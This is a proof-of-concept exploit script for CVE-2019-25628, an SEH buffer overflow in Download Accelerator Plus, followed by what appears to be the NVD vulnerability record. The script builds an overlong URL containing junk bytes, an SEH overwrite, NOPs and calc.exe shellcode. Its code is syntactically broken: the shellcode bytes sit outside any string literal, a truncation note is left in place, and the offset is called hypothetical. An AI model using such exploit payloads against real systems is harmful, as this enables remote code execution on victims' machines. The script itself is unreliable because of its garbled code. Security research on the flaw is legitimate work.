CVE-2019-25628

#!/usr/bin/env python # -*- coding: utf-8 -*- """ PoC for CVE-2019-25628 - Download Accelerator Plus SEH Buffer Overflow This script generates a malicious URL string designed to trigger the SEH overwrite. Note: Offsets may need adjustment based on specific environment debugging. """ import sys # Payload generation def generate_payload(): # 1. Junk data to fill the buffer up to the SEH handler # Offset value is hypothetical, requires debugging to determine exact offset offset = 1024 junk = b"A" * offset # 2. SEH overwrite structure # nseh: Short jump to skip the seh address and land on shellcode (\xeb\x06\x90\x90) nseh = b"\xeb\x06\x90\x90" # seh: Address of POP POP RET instruction (Universal or specific to DLL) # Example: 0x10020107 (from a non-ASLR module) seh = b"\x07\x01\x02\x10" # 3. Shellcode (Example: Calc.exe payload) # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python shellcode = b"" \x31\xc9\xba\x9c\xb9\x34\x73\xd9\xcd\xd9\x74\x24\xf4\x5e\x31\x56\x13 \x03\x56\x13\x83\xee\xfc\xe2\xe4\x9e\xc4\x9a\x5b\x6b\x95\x39\x9a\x3b\x64 \x58\x21\x9a\x82\x3b\x71\x7c\x18\xc7\x48\xda\x92\x60\x90\x44\x6f\x89 [Truncated for brevity] """ # Filling remaining space with NOPs for better reliability nops = b"\x90" * 100 payload = junk + nseh + seh + nops + shellcode return payload if __name__ == "__main__": print("[+] Generating malicious URL payload for CVE-2019-25628...") payload = generate_payload() malicious_url = b"http://malicious-site.com/exploit?" + payload print(f"[+] Payload length: {len(malicious_url)}") print("[+] Malicious URL generated (Use responsibly):") print(malicious_url.decode('latin1'))

{"cve": {"id": "CVE-2019-25628", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:02.777", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Download Accelerator Plus DAP 10.0.6.0 contains a structured exception handler buffer overflow vulnerability that allows remote attackers to execute arbitrary code by crafting malicious URLs. Attackers can create specially crafted URLs with overflowing buffer data that overwrites SEH pointers and executes embedded shellcode when imported through the application's web page import functionality."}, {"lang": "es", "value": "Download Accelerator Plus DAP 10.0.6.0 contiene una vulnerabilidad de desbordamiento de búfer en el gestor de excepciones estructuradas que permite a atacantes remotos ejecutar código arbitrario mediante la creación de URL maliciosas. Los atacantes pueden crear URL especialmente diseñadas con datos de búfer desbordados que sobrescriben los punteros SEH y ejecutan shellcode incrustado cuando se importa a través de la funcionalidad de importación de páginas web de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://www.speedbit.com/dap/", "source": "[email protected]"}, {"url": "http://www.speedbit.com/dap/download/downloading.asp", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46673", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/download-accelerator-plus-dap-seh-buffer-overflow", "source": "[email protected]"}]}}